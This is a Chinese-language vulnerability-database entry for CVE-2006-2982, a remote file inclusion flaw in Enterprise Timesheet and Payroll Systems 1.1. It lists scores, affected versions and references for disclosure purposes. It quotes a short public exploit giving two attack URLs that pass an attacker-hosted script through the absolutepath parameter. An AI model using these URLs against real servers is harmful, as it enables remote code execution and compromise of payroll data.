CVE-2006-2982
CVSS7.5
发布时间 :2006-06-12 21:02:00
修订时间 :2011-03-07 21:37:25
NMCOE    

[原文]Multiple PHP remote file inclusion vulnerabilities in Enterprise Timesheet and Payroll Systems (EPS) 1.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the absolutepath parameter in (1) footer.php and (2) admin/footer.php.


[CNNVD]Enterprise Timesheet/Payroll Systems 多个PHP远程文件包含漏洞(CNNVD-200606-236)

        Enterprise Timesheet和Payroll Systems (EPS) 1.1及更早版本中的多个PHP远程文件包含漏洞,远程攻击者通过(1)footer.php或(2)admin/footer.php的absolutepath参数中的URL执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:enterprise_payroll_systems:enterprise_payroll_systems:1.1
cpe:/a:enterprise_payroll_systems:enterprise_payroll_systems:1.01_alpha
cpe:/a:enterprise_payroll_systems:enterprise_payroll_systems:1.0_alpha

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2982
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2982
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-236
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/2219
(UNKNOWN)  VUPEN  ADV-2006-2219
http://secunia.com/advisories/20522
(VENDOR_ADVISORY)  SECUNIA  20522
http://milw0rm.com/exploits/1891
(UNKNOWN)  MILW0RM  1891
http://xforce.iss.net/xforce/xfdb/27024
(UNKNOWN)  XF  eps-absolutepath-file-include(27024)
http://www.securityfocus.com/bid/18364
(UNKNOWN)  BID  18364
http://www.osvdb.org/26266
(UNKNOWN)  OSVDB  26266
http://securitytracker.com/id?1016258
(UNKNOWN)  SECTRACK  1016258

- 漏洞信息

Enterprise Timesheet/Payroll Systems 多个PHP远程文件包含漏洞
高危 输入验证
2006-06-12 00:00:00 2006-06-13 00:00:00
远程  
        Enterprise Timesheet和Payroll Systems (EPS) 1.1及更早版本中的多个PHP远程文件包含漏洞,远程攻击者通过(1)footer.php或(2)admin/footer.php的absolutepath参数中的URL执行任意PHP代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (1891)

Enterprise Payroll Systems <= 1.1 (footer) Remote Include Vulnerability (EDBID:1891)
php webapps
2006-06-08 Verified
0 Kacper
N/A [点击下载]
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  Enterprise TimeSheet and Payroll (EPS) <= v.1.1 Remote File Include Vulnerability
$$  Script site: http://epayroll.sourceforge.net/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:


http://www.site.com/[EPS_path]/footer.php?absolutepath=[evil_scripts]

http://www.site.com/[EPS_path]/admin/footer.php?absolutepath=[evil_scripts]


#Pozdro dla wszystkich ;-)

# milw0rm.com [2006-06-08]
		

- 漏洞信息

26266
Enterprise Payroll Systems footer.php absolutepath Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Enterprise Payroll Systems contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to footer.php not properly sanitizing user input supplied to the 'absolutepath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-06-08 Unknow
2006-06-08 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站